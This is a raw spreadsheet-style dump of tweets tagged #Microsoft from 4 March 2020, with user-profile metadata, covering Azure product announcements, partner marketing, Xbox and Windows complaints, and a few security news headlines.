    <t>{'id': 806796381008465921, 'id_str': '806796381008465921', 'name': 'SankalpIT Services Pvt. Ltd.', 'screen_name': 'SankalpITteam', 'location': 'Mohali, India', 'description': 'Expertise in working with the MSPs to set up their #LabTech, #ScreenConnect and #ConnectWise Manage tools. SankalpIT is serving the #MSPs since 2013.', 'url': 'https://t.co/G5KkxiNgPc', 'entities': {'url': {'urls': [{'url': 'https://t.co/G5KkxiNgPc', 'expanded_url': 'https://www.sankalpit.com', 'display_url': 'sankalpit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2148, 'friends_count': 3397, 'listed_count': 8, 'created_at': 'Thu Dec 08 09:43:41 +0000 2016', 'favourites_count': 10586, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18185, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/907891925868453888/dcVjtsY3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/907891925868453888/dcVjtsY3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/806796381008465921/1582612751',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</si>
  <si>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18:12:45 +0000 2020</t>
  </si>
  <si>
    <t>Great time Today at the #Microsoft store at dadeland for the #VRCA ! Thank you @CTEMiami and @FVSHathletics for all your help! #coding #minecraftcode #AP https://t.co/gl3dIfelVX</t>
  </si>
  <si>
    <t>{'id': 1179039217747316736, 'id_str': '1179039217747316736', 'name': 'VarelaVRCA', 'screen_name': 'VVrca', 'location': 'Kendall, FL', 'description': '', 'url': 'https://t.co/rIUkRMRcS5', 'entities': {'url': {'urls': [{'url': 'https://t.co/rIUkRMRcS5', 'expanded_url': 'http://www.varelavrca.com', 'display_url': 'varelavrca.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 53, 'listed_count': 0, 'created_at': 'Tue Oct 01 14:23:59 +0000 2019', 'favourites_count': 474,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'http://pbs.twimg.com/profile_images/1179039319844999169/YVRObYgR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179039319844999169/YVRObYgR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1179039217747316736/1570650645',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</si>
  <si>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18:12:40 +0000 2020</t>
  </si>
  <si>
    <t>#Cisco #Microsoft team to control growing IoT networks https://t.co/FIVdvgi7TW via @networkworld</t>
  </si>
  <si>
    <t>{'id': 550769290, 'id_str': '550769290', 'name': 'M. Abou-Zaki', 'screen_name': 'mabouzaki', 'location': 'Abu Dhabi', 'description': 'Technology news covering UAE, KSA &amp; Lebanon (Cisco, DellEMC, Oracle, Software AG, IoT &amp; AI) CEO @ Emircom', 'url': 'https://t.co/QPlQlZo2XC', 'entities': {'url': {'urls': [{'url': 'https://t.co/QPlQlZo2XC', 'expanded_url': 'http://www.emircom.com', 'display_url': 'emircom.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 703, 'friends_count': 584, 'listed_count': 37, 'created_at': 'Wed Apr 11 07:00:50 +0000 2012', 'favourites_count': 292, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1719,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'http://pbs.twimg.com/profile_images/1208102621740969984/bmFMG3xe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208102621740969984/bmFMG3xe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/550769290/1517146248',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</si>
  <si>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18:12:28 +0000 2020</t>
  </si>
  <si>
    <t>OpenHack: Migrating Microsoft Workloads to Azure badge successfully achieved today. 
#azure #Microsoft #MSOpenHack https://t.co/wMoQYQSyi6</t>
  </si>
  <si>
    <t>{'id': 20985315, 'id_str': '20985315', 'name': 'Austin', 'screen_name': 'AustinTweeting', 'location': 'Belfast, Northern Ireland', 'description': 'Senior ops Engineer at kainos who lost a Delorean in time. My tweets are my own.', 'url': 'https://t.co/BHkHOwvmxL', 'entities': {'url': {'urls': [{'url': 'https://t.co/BHkHOwvmxL', 'expanded_url': 'https://medium.com/@austinlonergan', 'display_url': 'medium.com/@austinlonergan', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 163, 'friends_count': 157, 'listed_count': 2, 'created_at': 'Mon Feb 16 13:39:37 +0000 2009', 'favourites_count': 1001, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 27799, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1A1B1F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1095247096133898240/yVVASXYk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095247096133898240/yVVASXYk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20985315/1519136997', 'profile_link_color': '19CF86', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'EADEAA', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 18:12:02 +0000 2020</t>
  </si>
  <si>
    <t>@charltonbrooker maybe I am being cynical . Or maybe not. But , #Covid_19 #CoronaOutbreak happens in the same quarter #Microsoft release "Teams" !  Coincidence ? or money spinner in the face of a failing OS ? Make a great #Blackmirror ep. #urwelcome</t>
  </si>
  <si>
    <t>{'id': 108734472, 'id_str': '108734472', 'name': 'Gary Robinson', 'screen_name': 'Real__Robbo', 'location': 'The Republic of England', 'description': 'Interests : Italian culture , Ska ,The Jam,  cycling , Liverpool FC .', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 477, 'listed_count': 1, 'created_at': 'Tue Jan 26 22:16:55 +0000 2010', 'favourites_count': 1029, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1725,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'http://pbs.twimg.com/profile_images/1205610975715627008/uhRXpb23_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205610975715627008/uhRXpb23_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/108734472/1560711896', 'profile_link_color': '89C9FA',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</si>
  <si>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18:10:01 +0000 2020</t>
  </si>
  <si>
    <t>March's @Microsoft 365 productivity and collaboration updates are very exciting - especially for us remote workers. https://t.co/bLv2crAxab
2W Tech is a technology service provider, specializing in solutions for the #manufacturing industry. We are also a #Microsoft Gold Partner. https://t.co/nmu6V8WLso</t>
  </si>
  <si>
    <t>{'id': 822010356, 'id_str': '822010356', 'name': '2W Technologies, INC', 'screen_name': '2WTech', 'location': 'Pewaukee, WI/Chicago, IL/Erie, PA', 'description': 'Offering Customized Epicor, Infrastructure and IT Solutions', 'url': 'http://t.co/HrgLj1L7cR', 'entities': {'url': {'urls': [{'url': 'http://t.co/HrgLj1L7cR', 'expanded_url': 'http://www.2wtech.com', 'display_url': '2wtech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 83, 'friends_count': 31, 'listed_count': 20, 'created_at': 'Thu Sep 13 18:56:16 +0000 2012', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 978, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '15479C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/941406153807925248/iUZ736Lt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/941406153807925248/iUZ736Lt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/822010356/1514401326', 'profile_link_color': '15479C',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</si>
  <si>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Mar 04 18:09:40 +0000 2020</t>
  </si>
  <si>
    <t>Why do I need to Google and read 4 blogs to see exactly how to download #Chrome on #Windows Server 2019 with the only browser on the box?
Because it is too hard.
Ironically, cant download the #Edge browser from #Microsoft either. I imagine it is the same steps to fix it.</t>
  </si>
  <si>
    <t>{'id': 1703636556, 'id_str': '1703636556', 'name': 'Amanda Blevins', 'screen_name': 'AmandaBlev', 'location': 'Colorado', 'description': 'Chief Technologist, @vmwocto   #Gamer and #Mechanic by Night and Weekend. Tweets are my own. She/Her', 'url': 'https://t.co/CMeCDLBMuM', 'entities': {'url': {'urls': [{'url': 'https://t.co/CMeCDLBMuM', 'expanded_url': 'http://amandablevins.com', 'display_url': 'amandablevins.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2371, 'friends_count': 517, 'listed_count': 55, 'created_at': 'Tue Aug 27 03:59:09 +0000 2013', 'favourites_count': 4984, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2818,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'http://pbs.twimg.com/profile_images/1088097281184677888/6seo1kX9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088097281184677888/6seo1kX9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1703636556/1548257786',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</si>
  <si>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18:08:15 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft teases new Windows 10 Start menu that de-emphasizes Live Tiles https://t.co/vdICKpo28L via @Verge #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1056860140480143360, 'id_str': '1056860140480143360', 'name': 'Claes Stenborg', 'screen_name': 'ClaesStenborg', 'location': 'GÃ¶teborg, Sverige', 'description': 'Sales Executive - Cosmo Consult - Interested in: #Marketing #Tech #DigitalTransformation #ArtificialIntelligence #MixedReality #ERP #SaaS', 'url': 'https://t.co/5tddx1vzpV', 'entities': {'url': {'urls': [{'url': 'https://t.co/5tddx1vzpV', 'expanded_url': 'https://www.linkedin.com/in/claesstenborg/', 'display_url': 'linkedin.com/in/claesstenboâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1827, 'friends_count': 2745, 'listed_count': 11, 'created_at': 'Mon Oct 29 10:47:47 +0000 2018', 'favourites_count': 3800, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2423,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'http://pbs.twimg.com/profile_images/1197868083844657152/KHRm9bnJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197868083844657152/KHRm9bnJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1056860140480143360/1557600702',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</si>
  <si>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18:07:09 +0000 2020</t>
  </si>
  <si>
    <t>How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from Southwest Modern Data Systems, Inc.. https://t.co/oNcH8TLcoO</t>
  </si>
  <si>
    <t>{'id': 1516468766, 'id_str': '1516468766', 'name': 'David Giles', 'screen_name': 'dgiles_1', 'location': 'Bethany, OK', 'description': 'Microsoft CSP, Managed Services Partner and IT Consultant.', 'url': 'https://t.co/aVwWxV7U9L', 'entities': {'url': {'urls': [{'url': 'https://t.co/aVwWxV7U9L', 'expanded_url': 'http://www.swmds.com', 'display_url': 'swmds.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 58, 'friends_count': 30, 'listed_count': 2, 'created_at': 'Fri Jun 14 13:35:18 +0000 2013', 'favourites_count': 2316, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1539,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'http://pbs.twimg.com/profile_images/1211297615691821057/5X0gzp3Y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211297615691821057/5X0gzp3Y_normal.jpg',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</si>
  <si>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How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from Southwest Modern Data Systems, Inc.. https://t.co/a4UxWtIThn</t>
  </si>
  <si>
    <t>{'id': 972898718625054720, 'id_str': '972898718625054720', 'name': 'Southwest Modern Data Systems, Inc.', 'screen_name': 'SwmdsInc', 'location': 'Bethany, OK', 'description': 'We are a computer consulting firm and a Managed Services Provider. We are not just another MSP though, we provide solutions to help your business!', 'url': 'https://t.co/aVwWxV7U9L', 'entities': {'url': {'urls': [{'url': 'https://t.co/aVwWxV7U9L', 'expanded_url': 'http://www.swmds.com', 'display_url': 'swmds.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 5, 'listed_count': 1, 'created_at': 'Sun Mar 11 18:15:04 +0000 2018', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 521, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/972906513449730048/q2yNesbq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/972906513449730048/q2yNesbq_normal.png',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</si>
  <si>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18:05:11 +0000 2020</t>
  </si>
  <si>
    <t>Tomorrow at VOX ISMs FPAC event, our Director of Sales, Al MacKinnon will be hosting a presentation geared towards #Manufacturers looking to get measurable ROI out of their IIoT investments  dont miss out: https://t.co/53UYe6vy27 
#Toronto #Microsoft #Automation</t>
  </si>
  <si>
    <t>Wed Mar 04 18:04:12 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports  https://t.co/9P4J9L69e5 #Microsoft #Azure #AzureFamily</t>
  </si>
  <si>
    <t>Wed Mar 04 18:02:57 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports
https://t.co/e9c9OFJmAR
#Microsoft #Azure #Announcement #Cloud</t>
  </si>
  <si>
    <t>Wed Mar 04 18:02:39 +0000 2020</t>
  </si>
  <si>
    <t>R.I.P. my xbox one x. June 2018 - March 2020 .. HDMI output failed.. We had some good times, but it looks like next gen I'm going Playstation.. sad days we're living in #xbox #microsoft #RIP</t>
  </si>
  <si>
    <t>{'id': 1151117973375082496, 'id_str': '1151117973375082496', 'name': 'gorill4glu22', 'screen_name': 'gorill4glu22', 'location': 'Tennessee', 'description': 'Twitch affliate! - Home of low tier gameplay &amp; high tier southern accents! @erica_biddle ðŸ˜ðŸ’', 'url': 'https://t.co/WTu1WpZ2eb', 'entities': {'url': {'urls': [{'url': 'https://t.co/WTu1WpZ2eb', 'expanded_url': 'http://twitch.tv/gorill4glu22', 'display_url': 'twitch.tv/gorill4glu22', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 66, 'friends_count': 101, 'listed_count': 0, 'created_at': 'Tue Jul 16 13:14:46 +0000 2019', 'favourites_count': 174, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 179, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214812980908642305/fnPhTfrC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214812980908642305/fnPhTfrC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1151117973375082496/1563283495',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</si>
  <si>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18:02:34 +0000 2020</t>
  </si>
  <si>
    <t>People are afraid that robots will take their jobs. I cannot wait. Im SO over doing the same things over and over. #Microsoft #PowerAutomate gives end users the ability to automate tasks for themselves. Lets get started.  https://t.co/aizUw7w0sY</t>
  </si>
  <si>
    <t>Wed Mar 04 18:01:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Engineer Pleads #Guilty to $10m #Fraud Scheme https://t.co/ud0FiZUIik</t>
  </si>
  <si>
    <t>{'id': 125554333, 'id_str': '125554333', 'name': 'Hypersecu', 'screen_name': 'hypersecu', 'location': 'Canada', 'description': 'Hypersecu is a solution provider dedicated to multi-factor #authentication and software copyright protection. #2fa #otp #PKI #cybersecurity #infosec', 'url': 'https://t.co/qpkXW47AUR', 'entities': {'url': {'urls': [{'url': 'https://t.co/qpkXW47AUR', 'expanded_url': 'http://www.hypersecu.com', 'display_url': 'hypersecu.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 840, 'friends_count': 1255, 'listed_count': 155, 'created_at': 'Tue Mar 23 04:39:07 +0000 2010', 'favourites_count': 188, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2540,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'http://pbs.twimg.com/profile_images/793858515626397696/yBhRsakg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793858515626397696/yBhRsakg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/125554333/1478558564', 'profile_link_color': 'DD2E44',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</si>
  <si>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18:01:47 +0000 2020</t>
  </si>
  <si>
    <t>How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from OneStop Solutions. https://t.co/xrVxzbC2ef</t>
  </si>
  <si>
    <t>{'id': 1090267721701281796, 'id_str': '1090267721701281796', 'name': 'OneStop Solutions', 'screen_name': 'OneStop_Sol', 'location': 'Washington, USA', 'description': '"One Call. One Bill. One Stop."\n\nWe at OneStop Solutions are a one-stop-shop for every business or organizational need a client may have.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 28, 'listed_count': 1, 'created_at': 'Tue Jan 29 15:17:35 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1820, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1124516777218543617/zzJvMXfB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1124516777218543617/zzJvMXfB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1090267721701281796/1556940668',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</si>
  <si>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18:01:29 +0000 2020</t>
  </si>
  <si>
    <t>Wondering what #NolanBusinessSolutionsUS offers in the Microsoft ERP world? Find out on our website: https://t.co/UgrxzRxKXF 
#NolanBusinessSolutions  #MicrosoftDynamics #Microsoft DynamicsGP #ERP https://t.co/noJg18z0qF</t>
  </si>
  <si>
    <t>{'id': 84719202, 'id_str': '84719202', 'name': 'Nolan Business', 'screen_name': 'NolanBusSol', 'location': 'US', 'description': 'We extend the power of Dynamics GP and NetSuite to further streamline your business.\n#ERP #NetSuite #MicrosoftDynamicsGP', 'url': 'http://t.co/jRtf0hgDXI', 'entities': {'url': {'urls': [{'url': 'http://t.co/jRtf0hgDXI', 'expanded_url': 'http://nolanbusinesssolutions.com', 'display_url': 'nolanbusinesssolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 566, 'friends_count': 503, 'listed_count': 19, 'created_at': 'Fri Oct 23 23:40:20 +0000 2009', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 569,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'http://pbs.twimg.com/profile_images/1217114340978876416/oL9edhJ1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217114340978876416/oL9edhJ1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/84719202/1579103224',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</si>
  <si>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Wed Mar 04 18:00:34 +0000 2020</t>
  </si>
  <si>
    <t>Keeping it Versatile
https://t.co/syti4SRuvb
#Microsoft #PowerBI #DataAnalytics</t>
  </si>
  <si>
    <t>Wed Mar 04 18:00:07 +0000 2020</t>
  </si>
  <si>
    <t>We're headed to Pennsylvania on March 19th for a #Microsoft Security CIE! 
Join us to learn how @Microsoft365 Security Solutions can better protect users, applications, businesses &amp;amp; more. 
Sign up: https://t.co/8pF94k4xkA
@Microsoft #MicrosoftPartner #security #IT #tech https://t.co/76maQbXDhp</t>
  </si>
  <si>
    <t>Wed Mar 04 17:58:16 +0000 2020</t>
  </si>
  <si>
    <t>Just can't work from home all the time! #Microsoft Iselin https://t.co/ubzq4atgEy</t>
  </si>
  <si>
    <t>{'id': 1955441491, 'id_str': '1955441491', 'name': 'Janet E Blake', 'screen_name': 'janeteblake', 'location': '', 'description': 'Microsoft employee expressing my own opinions // Dynamics AX Technical Solution Architect // Natural beauty, character and sophistication! Oh, modesty too.', 'url': 'http://t.co/NpRbguAM1w', 'entities': {'url': {'urls': [{'url': 'http://t.co/NpRbguAM1w', 'expanded_url': 'http://janeteblake.wordpress.com', 'display_url': 'janeteblake.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1562, 'friends_count': 1779, 'listed_count': 27, 'created_at': 'Sat Oct 12 01:05:49 +0000 2013', 'favourites_count': 891, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1071,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000582515451/3377b1ad546516cc1714a8202e18a583_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000582515451/3377b1ad546516cc1714a8202e18a583_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1955441491/1392091887', 'profile_link_color': '9D582E', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EADEAA', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:57:43 +0000 2020</t>
  </si>
  <si>
    <t>@Windows Congrats on literally the WORST customer service ever. Ever. Two and a half hours on hold in total after a simple hardware change trying to get Windows activated again and nothing. Still on hold.
#CustomerService
#badservice #phone #time #customer #microsoft #windows</t>
  </si>
  <si>
    <t>{'id': 1558542312, 'id_str': '1558542312', 'name': 'Knight Who Says Ni', 'screen_name': 'Boogra', 'location': 'Close to a Shrubbery', 'description': 'Keeper of the Sacred Words', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 61, 'friends_count': 263, 'listed_count': 0, 'created_at': 'Sun Jun 30 17:47:26 +0000 2013', 'favourites_count': 1517, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1413, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0F0A02', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1197560646910521344/xFv7-vCH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197560646910521344/xFv7-vCH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1558542312/1574355683', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'BCB302', 'profile_sidebar_fill_color': '171106', 'profile_text_color': '8A7302', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:57:20 +0000 2020</t>
  </si>
  <si>
    <t>Backup Reports is now in preview https://t.co/tugzOFpJt7 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 17:57:19 +0000 2020</t>
  </si>
  <si>
    <t>Updates to Azure HDInsight https://t.co/76tJYsuLkx #Microsoft #Azure</t>
  </si>
  <si>
    <t>Azure Cosmos DB free tier is now available https://t.co/hdEovs65B4 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 17:57:18 +0000 2020</t>
  </si>
  <si>
    <t>Active Directory for authentication on SMB access to Azure File in preview https://t.co/9ejdGaNeHn #Microsoft #Azure</t>
  </si>
  <si>
    <t>New features in Azure Cosmos DB Jupyter notebooks are now in preview https://t.co/xR2iwcVb9M #Microsoft #Azure</t>
  </si>
  <si>
    <t>Azure FunctionsSupport for custom language workers over HTTP is now in preview https://t.co/WmkAISfdV6 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 17:57:17 +0000 2020</t>
  </si>
  <si>
    <t>Virtual machine scale sets now simpler to manage https://t.co/gpc5CFgTB4 #Microsoft #Azure</t>
  </si>
  <si>
    <t>PowerShell 7.0 is now generally available https://t.co/4tficAmO7w #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 17:57:16 +0000 2020</t>
  </si>
  <si>
    <t>Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities https://t.co/59aqLIiuMh #Microsoft #Azure</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/jSp5Dg3DlW #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 17:57:15 +0000 2020</t>
  </si>
  <si>
    <t>Update to the Microsoft Authenticator app now rolling out https://t.co/eknhaLMNtm #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:57:14 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/pUxthBDxDZ #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:55:12 +0000 2020</t>
  </si>
  <si>
    <t>Retailers are experiencing more changes than any other industry. Learn how to expand your vision for retail with #Microsoft Dynamics 365 here. https://t.co/nT1XQipC1y</t>
  </si>
  <si>
    <t>{'id': 537367743, 'id_str': '537367743', 'name': 'IBG', 'screen_name': 'IBG_Microsoft', 'location': 'Altamonte Springs, FL', 'description': 'Integrated Business Group, Inc. is a Microsoft Partner specializing in Microsoft Dynamics GP, Microsoft Dynamics CRM and Acumatica Cloud ERP', 'url': 'http://t.co/E8bSWPQi5N', 'entities': {'url': {'urls': [{'url': 'http://t.co/E8bSWPQi5N', 'expanded_url': 'http://www.integratedbusinessgroup.com', 'display_url': 'integratedbusinessgroup.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 253, 'friends_count': 159, 'listed_count': 12, 'created_at': 'Mon Mar 26 14:58:26 +0000 2012', 'favourites_count': 142, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1880,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'http://pbs.twimg.com/profile_images/2455480013/pv5a9e9ha8czc2u7thnl_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2455480013/pv5a9e9ha8czc2u7thnl_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/537367743/1518206333',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</si>
  <si>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17:55:10 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X's game resume feature even works after a reboot
#Xbox
#Microsoft
https://t.co/NbbmqVDY8z</t>
  </si>
  <si>
    <t>Wed Mar 04 17:54:16 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports  https://t.co/NkFZK7hgMh  #azure #microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:52:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft OneNote Used To Sidestep Phishing Detection #microsoft #phishing https://t.co/74i5uR4D07 https://t.co/ZXDXXjK4hL</t>
  </si>
  <si>
    <t>{'id': 4885368909, 'id_str': '4885368909', 'name': 'Vumetric', 'screen_name': 'vumetric', 'location': 'Canada', 'description': 'Experts in penetration testing, security audits, managed security services and cybersecurity. #cybersecurity', 'url': 'https://t.co/FhvELWz67k', 'entities': {'url': {'urls': [{'url': 'https://t.co/FhvELWz67k', 'expanded_url': 'https://www.vumetric.com', 'display_url': 'vumetric.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2489, 'friends_count': 2241, 'listed_count': 50, 'created_at': 'Sun Feb 07 18:22:19 +0000 2016', 'favourites_count': 154, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7676, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214189087772426240/q5ka92B-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214189087772426240/q5ka92B-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4885368909/1574890028',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</si>
  <si>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17:51:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will soon enable Scheduled meetings and Meeting recordings for free edition of Teams  #microsoft #teams #meetings #online #video #free #coronavirus | #RoadmapforSuccess https://t.co/1gUMHKlDoz</t>
  </si>
  <si>
